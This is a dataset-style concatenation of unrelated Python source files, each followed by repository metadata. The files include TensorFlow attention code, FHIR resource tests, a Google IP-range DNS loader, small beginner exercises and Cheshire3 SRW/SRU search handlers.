skip_att_threshold: If value is in range (0, 1), perform binarisation; else perform bernoulli sampling.
"""
# TODO: bookmark
def __init__(self,
context_layer=True,
alignments_keep_prob=1.0,
mask_type=None,
mask_init_value=0,
mask_bern_sample=False,
**kwargs):
logger.debug('Using {}.'.format(self.__class__.__name__))
super(MultiHeadAttentionWrapperV3, self).__init__(**kwargs)
if len(self._attention_mechanisms) != 1:
raise ValueError('Only a single attention mechanism can be used.')
self._context_layer = context_layer
self._alignments_keep_prob = alignments_keep_prob
if mask_type is None:
self._dense_layer = Dense
self._mask_params = {}
else:
self._dense_layer = masked_layer.MaskedDense
self._mask_params = dict(mask_type=mask_type,
mask_init_value=mask_init_value,
mask_bern_sample=mask_bern_sample)
# noinspection PyCallingNonCallable
def call(self, inputs, prev_state):
"""
Perform a step of attention-wrapped RNN.
This method assumes `inputs` is the word embedding vector.
This method overrides the original `call()` method.
"""
_attn_mech = self._attention_mechanisms[0]
attn_size = _attn_mech._num_units
batch_size = _attn_mech.batch_size
dtype = inputs.dtype
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
# `_cell_input_fn` defaults to
# `lambda inputs, attention: array_ops.concat([inputs, attention], -1)`
_dprint('{}: prev_state received by call(): {}'.format(
self.__class__.__name__, prev_state))
cell_inputs = self._cell_input_fn(inputs, prev_state.attention)
prev_cell_state = prev_state.cell_state
cell_output, curr_cell_state = self._cell(cell_inputs, prev_cell_state)
cell_batch_size = (cell_output.shape[0].value or tf.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory (encoder output) "
"and the query (decoder output). Are you using the "
"BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with tf.control_dependencies(
[tf.assert_equal(cell_batch_size, _attn_mech.batch_size, message=error_message)]):
cell_output = tf.identity(cell_output, name="checked_cell_output")
dtype = cell_output.dtype
assert len(self._attention_mechanisms) == 1
_attn_mech = self._attention_mechanisms[0]
alignments, attention_state = _attn_mech(cell_output, state=None)
if self._alignments_keep_prob < 1.:
alignments = tf.contrib.layers.dropout(inputs=alignments,
keep_prob=self._alignments_keep_prob,
noise_shape=None,
is_training=True)
if len(_shape(alignments)) == 3:
# Multi-head attention
# Expand from [batch_size, num_heads, memory_time] to [batch_size, num_heads, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 2)
# attention_mechanism.values shape is
# [batch_size, num_heads, memory_time, num_units / num_heads]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, num_heads, 1, num_units / num_heads].
# we then combine the heads
# [batch_size, 1, attention_mechanism.num_units]
attention_mechanism_values = _attn_mech.values_split
context = tf.matmul(expanded_alignments, attention_mechanism_values)
attention = tf.squeeze(combine_heads(context), [1])
else:
# Expand from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, attention_mechanism.num_units]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, attention_mechanism.num_units].
# we then squeeze out the singleton dim.
attention_mechanism_values = _attn_mech.values
context = tf.matmul(expanded_alignments, attention_mechanism_values)
attention = tf.squeeze(context, [1])
# Context projection
if self._context_layer:
# noinspection PyCallingNonCallable
attention = self._dense_layer(name='a_layer',
units=_attn_mech._num_units,
use_bias=False,
activation=None,
dtype=dtype,
**self._mask_params)(attention)
if self._alignment_history:
alignments = tf.reshape(alignments, [cell_batch_size, -1])
alignment_history = prev_state.alignment_history.write(prev_state.time, alignments)
else:
alignment_history = ()
curr_state = attention_wrapper.AttentionWrapperState(
time=prev_state.time + 1,
cell_state=curr_cell_state,
attention=attention,
attention_state=alignments,
alignments=alignments,
alignment_history=alignment_history
)
return cell_output, curr_state
@property
def state_size(self):
state = super(MultiHeadAttentionWrapperV3, self).state_size
_attn_mech = self._attention_mechanisms[0]
s = _shape(_attn_mech._values_split)[1:3]
state = state._replace(alignments=s[0] * s[1],
alignment_history=s[0] * s[1] if self._alignment_history else (),
attention_state=s[0] * s[1])
if _attn_mech._fm_projection is None and self._context_layer is False:
state = state.clone(attention=_attn_mech._feature_map_shape[-1])
else:
state = state.clone(attention=_attn_mech._num_units)
_dprint('{}: state_size: {}'.format(self.__class__.__name__, state))
return state
# noinspection PyProtectedMember
def zero_state(self, batch_size, dtype):
state = super(MultiHeadAttentionWrapperV3, self).zero_state(
batch_size, dtype)
_attn_mech = self._attention_mechanisms[0]
tf_ary_kwargs = dict(dtype=dtype,
size=0,
dynamic_size=True,
element_shape=None)
if _attn_mech._fm_projection is None and self._context_layer is False:
state = state._replace(
attention=tf.zeros(
[batch_size, _attn_mech._feature_map_shape[-1]], dtype),
alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
else:
state = state._replace(
attention=tf.zeros(
[batch_size, _attn_mech._num_units], dtype),
alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
_dprint('{}: zero_state: {}'.format(self.__class__.__name__, state))
return state
class BeamSearchDecoderMultiHead(tf.contrib.seq2seq.BeamSearchDecoder):
# noinspection PyProtectedMember
def _maybe_sort_array_beams(self, t, parent_ids, sequence_length):
"""Maybe sorts beams within a `TensorArray`.
Args:
t: A `TensorArray` of size `max_time` that contains `Tensor`s of shape
`[batch_size, beam_width, s]` or `[batch_size * beam_width, s]` where
`s` is the depth shape.
parent_ids: The parent ids of shape `[max_time, batch_size, beam_width]`.
sequence_length: The sequence length of shape `[batch_size, beam_width]`.
Returns:
A `TensorArray` where beams are sorted in each `Tensor` or `t` itself if
it is not a `TensorArray` or does not meet shape requirements.
"""
if not isinstance(t, tf.TensorArray):
return t
# pylint: disable=protected-access
if (not t._infer_shape or not t._element_shape
or t._element_shape[0].ndims is None
or t._element_shape[0].ndims < 1):
shape = (
t._element_shape[0] if t._infer_shape and t._element_shape
else tf.TensorShape(None))
tf.logger.warn("The TensorArray %s in the cell state is not amenable to "
"sorting based on the beam search result. For a "
"TensorArray to be sorted, its elements shape must be "
"defined and have at least a rank of 1, but saw shape: %s"
% (t.handle.name, shape))
return t
# shape = t._element_shape[0]
# pylint: enable=protected-access
# if not _check_static_batch_beam_maybe(
# shape, tensor_util.constant_value(self._batch_size), self._beam_width):
# return t
t = t.stack()
with tf.control_dependencies(
[_check_batch_beam(t, self._batch_size, self._beam_width)]):
return gather_tree_from_array(t, parent_ids, sequence_length)
| [
"[email protected]"
] | |
b0ad500120f8469b888e170431f17043052f3e7c | d57148c74b79954ff762ce3a02c1b0ef3e79d6a1 | /libs/smartmeshsdk-REL-1.3.0.1/libs/VManagerSDK/vmanager/models/net_reset_info.py | f58017d71ca05bfc882e34f73a9d91a3d9409ea4 | [
"BSD-3-Clause"
] | permissive | realms-team/solmanager | 62fb748b140361cf620b7dd8ff6df755afd42bbe | 95fa049df041add5f8d37c053ef560d0e5d06dff | refs/heads/master | 2020-04-11T10:00:21.086457 | 2018-11-20T15:49:27 | 2018-11-20T15:49:27 | 40,271,406 | 0 | 0 | BSD-3-Clause | 2018-11-20T15:49:28 | 2015-08-05T22:15:39 | Python | UTF-8 | Python | false | false | 3,061 | py | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetResetInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
NetResetInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'reload': 'bool'
}
self.attribute_map = {
'reload': 'reload'
}
self._reload = None
@property
def reload(self):
"""
Gets the reload of this NetResetInfo.
reload configuration after reset
:return: The reload of this NetResetInfo.
:rtype: bool
"""
return self._reload
@reload.setter
def reload(self, reload):
"""
Sets the reload of this NetResetInfo.
reload configuration after reset
:param reload: The reload of this NetResetInfo.
:type: bool
"""
self._reload = reload
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
9c50ac850f1e9d03b9356f0e58aa62b4a72ac2d5 | be61a9f30274514857ea34297719157f1e5b8447 | /fhir/resources/DSTU2/tests/test_provenance.py | 7ef6baef182c10f5c8210085602e62a429fe450a | [
"BSD-3-Clause"
] | permissive | jwygoda/fhir.resources | ceff3a620100d2e875136b86d3e82816c0e60a33 | 5053565570d1ca992d9971d20db813c53fd350b9 | refs/heads/master | 2021-02-05T02:59:17.436485 | 2019-07-18T10:57:33 | 2019-07-18T10:57:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,361 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2019-05-14.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import provenance
from .fhirdate import FHIRDate
class ProvenanceTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Provenance", js["resourceType"])
return provenance.Provenance(js)
def testProvenance1(self):
inst = self.instantiate_from("provenance-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
self.implProvenance1(inst)
js = inst.as_json()
self.assertEqual("Provenance", js["resourceType"])
inst2 = provenance.Provenance(js)
self.implProvenance1(inst2)
def implProvenance1(self, inst):
self.assertEqual(inst.agent[0].relatedAgent[0].target, "#a1")
self.assertEqual(inst.agent[0].relatedAgent[0].type.text, "used")
self.assertEqual(inst.agent[0].role.code, "author")
self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
self.assertEqual(inst.agent[0].userId.value, "hhd")
self.assertEqual(inst.agent[1].id, "a1")
self.assertEqual(inst.agent[1].role.code, "DEV")
self.assertEqual(inst.agent[1].role.system, "http://hl7.org/fhir/v3/ParticipationType")
self.assertEqual(inst.entity[0].display, "CDA Document in XDS repository")
self.assertEqual(inst.entity[0].reference, "DocumentReference/90f55916-9d15-4b8f-87a9-2d7ade8670c8")
self.assertEqual(inst.entity[0].role, "source")
self.assertEqual(inst.entity[0].type.code, "57133-1")
self.assertEqual(inst.entity[0].type.display, "Referral note")
self.assertEqual(inst.entity[0].type.system, "http://loinc.org")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.period.start.date, FHIRDate("2015-06-27").date)
self.assertEqual(inst.period.start.as_json(), "2015-06-27")
self.assertEqual(inst.policy[0], "http://acme.com/fhir/Consent/25")
self.assertEqual(inst.reason[0].coding[0].code, "3457005")
self.assertEqual(inst.reason[0].coding[0].display, "Referral")
self.assertEqual(inst.reason[0].coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.reason[0].text, "Accepting a referral")
self.assertEqual(inst.recorded.date, FHIRDate("2015-06-27T08:39:24+10:00").date)
self.assertEqual(inst.recorded.as_json(), "2015-06-27T08:39:24+10:00")
self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
self.assertEqual(inst.text.status, "generated")
def testProvenance2(self):
inst = self.instantiate_from("provenance-example-sig.json")
self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
self.implProvenance2(inst)
js = inst.as_json()
self.assertEqual("Provenance", js["resourceType"])
inst2 = provenance.Provenance(js)
self.implProvenance2(inst2)
def implProvenance2(self, inst):
self.assertEqual(inst.activity.coding[0].code, "AU")
self.assertEqual(inst.activity.coding[0].display, "authenticated")
self.assertEqual(inst.activity.coding[0].system, "http://hl7.org/fhir/v3/DocumentCompletion")
self.assertEqual(inst.agent[0].role.code, "verifier")
self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
self.assertEqual(inst.agent[0].userId.value, "hhd")
self.assertEqual(inst.id, "signature")
self.assertEqual(inst.reason[0].coding[0].code, "TREAT")
self.assertEqual(inst.reason[0].coding[0].display, "treatment")
self.assertEqual(inst.reason[0].coding[0].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.recorded.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
self.assertEqual(inst.recorded.as_json(), "2015-08-27T08:39:24+10:00")
self.assertEqual(inst.signature[0].blob, "Li4u")
self.assertEqual(inst.signature[0].contentType, "application/signature+xml")
self.assertEqual(inst.signature[0].type[0].code, "1.2.840.10065.1.12.1.5")
self.assertEqual(inst.signature[0].type[0].display, "Verification")
self.assertEqual(inst.signature[0].type[0].system, "http://hl7.org/fhir/valueset-signature-type")
self.assertEqual(inst.signature[0].when.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
self.assertEqual(inst.signature[0].when.as_json(), "2015-08-27T08:39:24+10:00")
self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
self.assertEqual(inst.text.status, "generated")
| [
"[email protected]"
] | |
060cab4de8f90448bb3a7351dec20cafcc81a448 | 3b593b412c663a34784b1f60ad07cd2ee6ef87d1 | /month01/python base/day04/exercise05.py | 37e1bf28579cef5876ac0302e9c634075a9418dc | [] | no_license | ShijieLiu-PR/Python_Learning | 88694bd44aeed4f8b022202c1065342bd17c26d2 | ed01cc0956120ea287c51667604db97ff563c829 | refs/heads/master | 2023-05-22T16:35:24.252313 | 2021-06-16T10:56:21 | 2021-06-16T10:56:21 | 337,445,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | # 练习5:在控制台中输入一个整数,根据整数打印一个正方形。如下:
"""
****
* *
* *
****
"""
size = int(input("Please input an int:"))
for item in range(size):
if item == 0 or item == size - 1:
print("*" * size)
else:
print("*" + " " * (size - 2) + "*")
| [
"[email protected]"
] | |
3ca4847d2fcea8e14b515ef04ca57fdbab37f57c | 4f770819f1b9ce66c847873f02d65a7250d3c0b9 | /myapp/test.py | ffb04a90d437b452a9827535e387313d97b522c9 | [] | no_license | alexaugusto23/Moscow_Ring_Road_Coordinates | 58ec6b606679aab34d0941b7c57374071b3821ad | 51daf7f88e9b2c02df174a44931c86afc079aeb1 | refs/heads/main | 2023-08-31T14:26:08.446962 | 2021-09-19T01:43:21 | 2021-09-19T01:43:21 | 405,960,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | import unittest
from app import app
import re
class TestHomeView(unittest.TestCase):
'''
As all 3 test cases do a get home "/"
from our application, we define the setUp function. she is executed
automatically whenever unittest instantiates the TestHomeView class.
The setUp function is similar to a constructor method.
'''
def setUp(self):
my_app = app.test_client()
self.response_root = my_app.get('/')
self.response_form = my_app.get('/form')
# Testamos se a resposta e 200 ("ok")
def test_get(self):
self.assertEqual(200, self.response_root.status_code)
# Testamos se o content_type da resposta da home esta correto
def test_content_type(self):
self.assertIn('text/html', self.response_root.content_type)
# Testamos se a nossa home retorna a string "ok"
def test_html_string_response(self):
string = self.response_form.data.decode('utf-8')
print(string)
padrao = "([0-9]{0,1000000000}) ([a-z]{2})"
resposta = re.search(padrao, string).group()
print(resposta)
self.assertEqual( resposta, self.response_form.data.decode('utf-8') )
if __name__ == '__main__':
log_file = 'log_file.txt'
with open(log_file, "w") as file:
runner = unittest.TextTestRunner(file)
unittest.main(testRunner=runner)
runner.close()
# python -m unittest test.py | [
"[email protected]"
] | |
be1ad681d98b756c3bd0497d05278e59db83c92b | 5017db085d3316e7954fa9beb258ab964cc0beb5 | /netlookup/network_sets/google.py | 6e6626a13ab2d04d3ad71db33ae57441be13b84c | [
"BSD-3-Clause"
] | permissive | hile/netlookup | 698e68577096fbb74daa9ba205624ddc49b357e4 | 1bc00271500d4daa279acc11590b5dcf40a0b85e | refs/heads/main | 2023-07-19T20:43:42.855035 | 2023-07-09T03:02:00 | 2023-07-09T03:02:00 | 191,030,505 | 0 | 0 | NOASSERTION | 2023-02-11T02:23:41 | 2019-06-09T16:36:59 | Python | UTF-8 | Python | false | false | 3,324 | py | #
# Copyright (C) 2020-2023 by Ilkka Tuohela <[email protected]>
#
# SPDX-License-Identifier: BSD-3-Clause
#
"""
Google services address prefix set
"""
import re
from datetime import datetime
from operator import attrgetter
from typing import Optional
from dns import resolver
from ..exceptions import NetworkError
from .base import NetworkSet, NetworkSetItem
RE_INCLUDE = re.compile(r'^include:(?P<rr>.*)$')
RE_IPV4 = re.compile(r'^ip4:(?P<prefix>.*)$')
RE_IPV6 = re.compile(r'^ip6:(?P<prefix>.*)$')
GOOGLE_CLOUD_ADDRESS_LIST_RECORD = '_cloud-netblocks.googleusercontent.com'
GOOGLE_SERVICES_ADDRESS_LIST_RECORD = '_spf.google.com'
def google_rr_dns_query(record: str) -> Optional[str]:
"""
DNS query to get TXT record list of google networks
"""
try:
res = resolver.resolve(record, 'TXT')
return str(res.rrset[0].strings[0], 'utf-8')
except (resolver.NoAnswer, resolver.NXDOMAIN) as error:
raise NetworkError(f'Error querying TXT record for {record}: {error}') from error
def process_google_rr_ranges(record: str, loader_class):
"""
Process RR records from google DNS query response
"""
networks = []
includes = []
for field in google_rr_dns_query(record).split(' '):
match = RE_IPV4.match(field)
if match:
networks.append(loader_class(match.groupdict()['prefix']))
continue
match = RE_IPV6.match(field)
if match:
networks.append(loader_class(match.groupdict()['prefix']))
continue
match = RE_INCLUDE.match(field)
if match:
include = match.groupdict()['rr']
networks.extend(
process_google_rr_ranges(include, loader_class)
)
includes.append(include)
continue
return networks
class GoogleNetworkSet(NetworkSet):
"""
Google network set with data for TXT DNS records
"""
@property
def __address_list_record__(self) -> None:
raise NotImplementedError
def fetch(self) -> None:
"""
Fetch Google Cloud network records from DNS
"""
self.__networks__.clear()
networks = process_google_rr_ranges(self.__address_list_record__, self.loader_class)
for network in networks:
self.__networks__.append(network)
self.updated = datetime.now()
self.__networks__.sort(key=attrgetter('version', 'cidr'))
class GoogleCloudPrefix(NetworkSetItem):
"""
Google cloud network prefix
"""
type = 'google-cloud'
class GoogleCloud(GoogleNetworkSet):
"""
Google Cloud address ranges
"""
type: str = 'google-cloud'
cache_filename: str = 'google-cloud-networks.json'
loader_class = GoogleCloudPrefix
@property
def __address_list_record__(self) -> str:
return GOOGLE_CLOUD_ADDRESS_LIST_RECORD
class GoogleServicePrefix(NetworkSetItem):
"""
Google services network prefix
"""
type = 'google'
class GoogleServices(GoogleNetworkSet):
"""
Google services address ranges
"""
type: str = 'google'
cache_filename: str = 'google-service-networks.json'
loader_class = GoogleServicePrefix
@property
def __address_list_record__(self) -> str:
return GOOGLE_SERVICES_ADDRESS_LIST_RECORD
| [
"[email protected]"
] | |
1c9ad65b85f7f793307ac30b98a6775a9dee079b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_173/ch20_2020_03_04_20_04_41_273583.py | 24e06e78098124022a59a5bfb6d4b88ca932758a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | distancia = float(input('Escreva a distância que você quer percorrer em km'))
if distancia <= 200:
valor = 0.5*distancia
else:
valor = 0.45*distancia + 100
print (distancia) | [
"[email protected]"
] | |
b6c02ef994d8aeabf68bfdecae107c5fc0bc404c | 5fdcb39eaa9d1f44e2ba0130bc0d6ece3f5ff354 | /code/cheshire3/web/srwHandler.py | 7ea429dc225a21f7918e3b0a4d832d549d429102 | [] | no_license | Cheshire-Grampa/cheshire3 | 0a653d6372497290d938e098b6acf8366348133f | 616ab36cd8442cd5f4712a9fccf65ca7ae9f692c | refs/heads/master | 2020-12-25T07:26:16.366754 | 2012-06-06T09:52:53 | 2012-06-06T10:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,168 | py |
# Handlers for SRW Operations
# Version: 1.1
# Author: Rob Sanderson ([email protected])
# John Harrison ([email protected])
#
# Version History:
# 08/10/2007 - JH - Automatic insertion of database metadata into explain response
# 06/12/2007 - JH - Some extension handling fixes
#
import os, sys, re
import SRW
import SRW.types
from ZSI import *
from PyZ3950.SRWDiagnostics import *
from xml.sax.saxutils import escape
from srwExtensions import *
from cheshire3.baseObjects import Session, RecordStore
from cheshire3.document import StringDocument
from cheshire3.utils import flattenTexts
from cheshire3 import internal
import cheshire3.cqlParser as CQLParser
# -------------------------------------------------------------------
# Data transformations
#
# NB: Sort Keys from Version 1.0 and 1.1
# Version 1.2 uses CQL to carry sort info, so this becomes redundant
def parseSortKeys(self):
" Parse sortKeys parameter to sortStructure "
self.sortStructure = []
if (self.sortKeys):
# First try some simple parsing...
self.sortKeys = self.sortKeys.strip()
sks = self.sortKeys.split()
# TODO: Maybe write better sortKey parser
if (len(sks) > 1):
for s in sks:
if not (s[0] in ['"', '/']):
# Paths should always start with / or " something is screwed up
pass
skObjects = []
for skstr in sks:
sko = SRW.types.SortKey('sortKey')
sk = skstr.split(",")
sko.path = sk[0]
try:
sko.schema = sk[1]
sko.ascending = int(sk[2])
sko.caseSensitive = int(sk[3])
sko.missingValue = sk[4]
except:
# No problems if these fail from indexError
pass
skObjects.append(sko)
self.sortStructure = skObjects
SRW.types.SearchRetrieveRequest.parseSortKeys = parseSortKeys
def process_extraData(hash, req, resp, other=None):
for ((uri, name), fn) in hash.iteritems():
# Check name in request, call fn
# XXX: probably need to do this recursively...
for node in req.extraRequestData:
if node.localName == name and node.namespaceURI == uri:
fn(req, resp, other)
# XXX: too much descending here - John
# elem = node.childNodes[0]
# if elem.localName == name and elem.namespaceURI == uri:
# fn(req, resp, other)
# ---- Main query handler ----
xmlver = re.compile("[ ]*<\?xml[^>]+>")
def process_searchRetrieve(self, session, req):
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
# Get our config based on URL
config = req.config
db = config.parent
session.database = db.id
rss = db.get_object(session, 'defaultResultSetStore')
# Setup for processing
if (req.query != ""):
req.queryStructure = CQLParser.parse(req.query)
else:
# No Query, Request is seriously Broken
f = Diagnostic7()
f.message = 'Request must include a query'
f.details = 'query'
raise f
req.queryStructure.config = config
req.xQuery = req.queryStructure.toXCQL()
self.echoedSearchRetrieveRequest = req
req.parseSortKeys()
if (req.diagnostics):
self.diagnostics = req.diagnostics
return
# Check if we recognise the record Schema
schema = req.get('recordSchema')
# Redirect to full value
if (config.recordNamespaces.has_key(schema)):
schema = config.recordNamespaces[schema]
if (not schema in config.recordNamespaces.values()):
diag = Diagnostic66()
diag.details = schema
raise diag
txr = config.transformerHash.get(schema, None)
recordPacking = req.get('recordPacking')
if not recordPacking in ["string", "xml"]:
diag = Diagnostic71()
diag.details = req.recordPacking;
raise diag
# Fencepost. SRW starts at 1, C3 starts at 0
startRecord = req.get('startRecord') -1
maximumRecords = req.get('maximumRecords')
ttl = req.get('resultSetTTL')
nsk = len(req.sortStructure)
rsn = req.queryStructure.getResultSetId()
rs = db.search(session, req.queryStructure)
recs = []
if (rs != None):
self.numberOfRecords = len(rs)
if (ttl and not rsn):
rs.expires = ttl
rsn = rss.create_resultSet(session, rs)
self.records = []
end = min(startRecord+maximumRecords, len(rs))
for rIdx in range(startRecord, end):
rsi = rs[rIdx]
r = rsi.fetch_record(session)
ro = SRW.types.Record('record')
ro.recordPacking = recordPacking
ro.recordSchema = schema
if (txr != None):
doc = txr.process_record(session, r)
rec = doc.get_raw(session)
rec = xmlver.sub("", rec)
else:
rec = r.get_xml(session)
if recordPacking == "string":
ro.recordData = escape(rec)
else:
ro.recordData = rec
process_extraData(config.recordExtensionHash, req, ro, r)
recs.append(ro)
self.records = recs
nrp = end + 1 # Back to SRU 1-based recordPosition
if ( nrp < self.numberOfRecords and nrp > 0):
self.nextRecordPosition = nrp
if (rsn):
self.resultSetId = rsn
self.resultSetIdleTime = ttl
else:
self.numberOfRecords = 0
self.extraResponseData = [] # empty to prevent data from previous requests
process_extraData(config.searchExtensionHash, req, self, rs)
process_extraData(config.responseExtensionHash, req, self)
SRW.types.SearchRetrieveResponse.processQuery = process_searchRetrieve
def process_scan(self, session, req):
# Process a scan query
config = req.config
db = config.parent
session.database = db.id
self.terms = []
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
if req.scanClause:
#convert clause into SearchClause object
clause = CQLParser.parse(req.scanClause)
# Stupid schema.
xsc = []
xsc.append(clause.index.toXCQL())
xsc.append(clause.relation.toXCQL())
xsc.append(clause.term.toXCQL())
req.xScanClause = "".join(xsc)
else:
# Seriously broken request.
f = Diagnostic7()
f.message = 'Request must include a query'
f.details = 'scanClause'
raise f
self.echoedScanRequest = req
if (req.diagnostics):
self.diagnostics = req.diagnostics
return
mt = req.get('maximumTerms')
rp = req.get('responsePosition')
if (rp < 0 or rp > (mt+1)):
f = Diagnostic120()
f.message = "Response position out of range"
f.details = str(rp)
raise f
if (not clause.term.value):
clause.term.value = chr(0)
clause.config = config
if (rp == 1):
data = db.scan(session, clause, mt, direction=">=")
elif (rp == 0):
data = db.scan(session, clause, mt, direction=">")
elif (rp == mt):
data = db.scan(session, clause, mt, direction="<=")
data.reverse()
elif (rp == mt+1):
data = db.scan(session, clause, mt, direction="<")
data.reverse()
else:
# Need to go up and down
data1 = db.scan(session, clause, mt-rp+1, direction=">=")
data = db.scan(session, clause, rp, direction="<=")
if data1[0][0] == data[0][0]:
data = data[1:]
data.reverse()
data.extend(data1)
for d in data:
t = SRW.types.ScanTerm('ScanTerm')
t.value = d[0]
t.numberOfRecords = d[1][1]
process_extraData(config.termExtensionHash, req, t, d)
self.terms.append(t)
process_extraData(config.scanExtensionHash, req, self)
process_extraData(config.responseExtensionHash, req, self)
SRW.types.ScanResponse.processQuery = process_scan
def process_explain(self, session, req):
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
config = req.config
self.echoedExplainRequest = req
p = config.get_path(session, 'zeerexPath')
if (not os.path.isabs(p)):
p2 = config.get_path(session, 'defaultPath')
p = os.path.join(p2, p)
f = open(p, "r")
if f:
filestr = f.read()
# insert some database metadata
db = config.parent
session.database = db.id
try:
from lxml import etree
except ImportError:
# possibly try a slower DOM API, but for now...
pass
else:
nsHash = {'zrx':"http://explain.z3950.org/dtd/2.0/" ,'c3':"http://www.cheshire3.org/schemas/explain/"}
et = etree.XML(filestr)
dbNode = et.xpath('//zrx:explain/zrx:databaseInfo', namespaces=nsHash)[0]
try: impNode = dbNode.xpath('//zrx:implementation', namespaces=nsHash)[0]
except IndexError:
impNode = etree.XML('''<implementation identifier="http://www.cheshire3.org" version="%d.%d.%d">
<title>Cheshire3 SRW/U Server</title>
<agents>
<agent type="vendor">The University of Liverpool</agent>
</agents>
</implementation>''' % internal.cheshireVersion)
dbNode.append(impNode)
if db.totalItems:
try: extNode = dbNode.xpath('//zrx:extent', namespaces=nsHash)[0]
except IndexError:
etree.SubElement(dbNode, 'extent', {'numberOfRecords': str(db.totalItems)})
else:
extNode.set('numberOfRecords', str(db.totalItems))
if db.lastModified:
try: histNode = dbNode.xpath('//zrx:history', namespaces=nsHash)[0]
except IndexError:
# create history and append node
etree.SubElement(dbNode, 'history', {'lastUpdate': db.lastModified})
else:
histNode.set('lastUpdate', db.lastModified)
filestr = etree.tostring(et) # serialise modified record to string
# Create a record object and populate
rec = SRW.types.Record('record')
rec.recordPacking = req.recordPacking
if (req.recordPacking == 'string'):
filestr = escape(filestr)
rec.recordSchema = config.recordNamespaces['zeerex']
rec.recordData = filestr
self.record = rec
process_extraData(config.explainExtensionHash, req, self)
process_extraData(config.responseExtensionHash, req, self)
SRW.types.ExplainResponse.processQuery = process_explain
# ----- Update v0.4 -----
# TODO: Update record update implementation
SRW.update.ExplainResponse.processQuery = process_explain
def unpack_record(self, session, req):
declre = re.compile('<\?xml(.*?)\?>')
if req.record:
packing = req.record.recordPacking
if packing == "string":
data = req.record.recordData
data = declre.sub('', data)
doc = StringDocument(data)
elif packing == "url":
raise NotImplementedError
elif packing == "xml":
# Should be a DOM node, not string repr?
doc = StringDocument(req.record.recordData)
else:
diag = Diagnostic1()
raise diag
doc._schema = req.record.recordSchema
else:
doc = None
return doc
SRW.update.UpdateResponse.unpack_record = unpack_record
def fetch_record(self, session, req):
if (req.recordIdentifier):
db = req._db
recStore = db.get_path(session, 'recordStore')
val = req.recordIdentifier
